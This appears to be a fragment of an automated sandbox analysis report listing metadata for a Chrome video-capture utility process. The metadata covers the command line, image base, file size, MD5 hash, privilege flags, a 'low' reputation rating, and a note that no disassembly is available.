                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6456 --field-trial-handle=1956,i,1385837072014725862,5014382410172538292,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  No disassembly